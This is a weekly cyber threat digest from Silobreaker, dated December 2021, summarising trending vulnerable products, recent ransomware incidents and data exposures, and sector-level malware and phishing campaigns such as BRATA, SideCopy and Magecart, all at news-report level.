09 December 2021

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Name Heat 7
Huawei Smartphone
Mozilla Firefox
ZOHO ManageEngine ServiceDesk Plus
SonicWall SMA 100 Series
Deep & Dark Web
Name Heat 7
Microsoft Exchange Server Enterprise
Apple MacBook
Apache HTTP Server

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches

Leaks & Breaches
Company Information Affected
Kisters AG (Germany) Following a ransomware attack on November 10th, 2021, Conti threat actors temporarily published 5% of data allegedly stolen from the company’s servers. It is unclear why the listing was later removed. Unknown
Delta-Montrose Electric Association (US) The company allegedly lost 25 years of historic data in a cyberattack discovered on November 7th, 2021. According to ZDNet, the incident may have been a ransomware attack. The company claims no sensitive employee or customer data was breached. Unknown
Social Enterprise for Canada Their systems were encrypted by ransomware on November 23rd, 2021. The attack escalated by December 1st, 2021, when some clients received emails threatening to leak their personal information if they did not press an attached link. Unknown
Unknown (China) An unclaimed ElasticSearch server exposed 329,144 sensitive records, totaling around 500MB of data, since November 2020. It is thought to belong to an anonymous Chinese enterprise resource planning company. The exposed data includes buyer names, phone numbers, email addresses, delivery and billing addresses. Exposed data on e-commerce sellers includes names, email addresses, billing addresses, and estimated profits. ~ 150,000
Gale Healthcare Solutions (US) A non-password protected database belonging to the company was discovered. It contained 170,239 records, including employee names, phones, email and home addresses, images, and tax documents featuring Social Security numbers. Unknown
Tulane University Police Department (US) An unredacted Daily Activity Report from the department was accessible to anyone with a Tulane University email address. The files exposed the names of victims, witnesses, reporting persons, individuals seeking medical attention, and suspects who interacted with the department. Dates of birth, phone numbers, and addresses were also visible. Unknown
Gravatar (US) A vulnerability in the add-on service, first identified in 2020, resulted in the scrape and distribution of names, usernames, and MD5 hashes of email addresses. Of the MD5 hashes, just under 114 million were cracked and distributed alongside the source hash, therefore disclosing the original email address. 167,000,000
CareFirst BlueCross BlueShield Community Health Plan District of Columbia (US) Snatch threat actors added the company to their dark web leak site following a ransomware attack in January 2021. Snatch Team claim that 25GB of data was exfiltrated. Data published as proof includes several files containing protected health information. 200,665
LINE Pay (Japan) An employee accidentally published the payment details of Japanese, Taiwanese, and Thai users from December 2020 to April 2021 on Github. The data was accessible for ten weeks and exposed dates, times, and amounts of transactions, as well as user and franchise store identification numbers. 133,00
Unknown Spectral researchers discovered complete Apache Kafka clusters exposed on the internet due to misconfigured instances of the open source Kafka UI and management interface, Kafdrop. Affected sectors include insurance, healthcare, Internet of Things, media, and social networks. Customer data, transactions, medical records, internal system traffic, and more were exposed. Unknown
Nordic Choice Hotels (Norway) A cyberattack occurred on December 2nd, 2021, affecting reservations, check-in, and other systems. Customers’ reservation details, emails, and phone numbers may have been affected. Unknown
Abiom (Netherlands) Volkskrant reported the company was targeted by LockBit ransomware operators. The actor leaked 39,000 documents relating to the Dutch government, police, emergency services, and others. Exposed information includes ID documents, police invoices, confidential communication, and details of equipment used by the defence department. Unknown
Vestas (Denmark) The company confirmed data was stolen during the recent ransomware attack. The data may have also been leaked and shared with third parties. Unknown
Pellissippi State Community College (US) The college suffered a network outage on December 6th, 2021, which has since been identified as a ransomware attack. As of December 7th, 2021, all network connections across their campuses remained down. Unknown
RATP Group (France) An old HTTP server belonging to the company was left open and accessible. The exposed data included configuration files, source codes with API keys, and an SQL database containing over 3 million records. These included personally identifiable information such as names, email addresses, logins, and hashed passwords. 57,000
MaxiPublica (Mexico) A data breach occurred due to an internal mistake whereby the company system sent all users and users’ clients an email containing a link to its entire database. Around 2,400 businesses are also thought to be affected. 1,500,000
Microsoft Vancouver (Canada) In September 2021, Cyber News researchers discovered a Desktop Services Store file exposed on a publicly accessible web server. The file contained links to several WordPress databases featuring administrator email addresses and MD5 hashed passwords for the company’s website. Unknown
CS Energy (Australia) The company was listed on a Conti ransomware leak site belonging to the Wizard Spider threat group following a ransomware attack in November 2021. Unknown

Malware mentions in Government

Time Series

This chart shows the trending malware related to Government within a curated list of cyber sources over the past week.

Weekly Industry View

Industry View
Industry Information
Banking & Finance A smishing campaign delivering the Android banking trojan BRATA is targeting customers of one of the biggest Italian retail banks, whilst new samples discovered in mid-October targeted customers of three Italian banks. Fake SMS messages impersonating the banks contain links to phishing websites used to steal credentials and other relevant information from the victim.The malware has remote access trojan capabilities, including intercepting SMS messages, screen recording and casting, removing itself from the compromised device to reduce detection, modifying the device settings, and more. 
Education Proofpoint researchers observed an increase in credential theft campaigns targeting mostly North American education institutions with lures including COVID-19 testing information and the Omicron variant. The campaigns using these lures began in October 2021. The phishing emails contain malicious attachments or URLs, and the landing pages often imitate a university login portal or a generic Office 365 login portal. The researchers also observed that threat actors attempted to harvest multi-factor authentication credentials in some of the campaigns.
Critical Infrastructure The United States Federal Bureau of Investigation (FBI) issued a flash alert in coordination with the Cybersecurity and Infrastructure Security Agency (CISA) disclosing that at least 49 US critical infrastructure organisations were compromised by Cuba ransomware operators as of November 2021. The targeted sectors include financial, government, healthcare, manufacturing, and information technology. The FBI also revealed the actors demanded at least $74 million in ransom payments, and received at least $43.9 million.
Government Malwarebytes Labs researchers observed the advanced persistent threat actor SideCopy using new initial infection vectors and a new stealer, named AuTo Stealer. SideCopy primarily targets South Asian countries, specifically India and Afghanistan, via spam or phishing campaigns. Successful attacks targeted the Administration Office of the President of Afghanistan personnel, Ministry of Foreign Affairs of Afghanistan, Ministry of Finance of Afghanistan, Afghanistan’s National Procurement Authority, and others. From these victims, SideCopy exfiltrated data such as credentials, access to government portals, banks services, personal accounts like Twitter and Facebook, password-protected documents, diplomatic visa and diplomatic ID cards, and more.
Retail & Hospitality Since February 4th, 2021, Gemini researchers observed ongoing Magecart campaigns that have infected 316 e-commerce sites with trojanised Google Tag Manager (GTM) containers. One infection variant embeds a malicious e-skimmer JavaScript in the container. Another variant uses a single GTM container across all victims, which houses a script that downloads the e-skimmer script from a separate dual-use domain also used for data exfiltration. The researchers have attributed the variants to two separate Magecart groups. This campaign primarily targeted Magento 2 users in the United States, however, targets were also identified in Canada, Germany, Italy, Australia, the United Kingdom, and more. So far, the actors behind this campaign have posted at least 88,000 payment card records to the dark web.

News and information concerning each mentioned industry over the last week.

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Silobreaker Weekly Cyber Digest

Sign up for weekly news on data breaches, hacker groups, malware and vulnerabilities.

This website uses cookies.
See our privacy policy at www.silobreaker.com/legal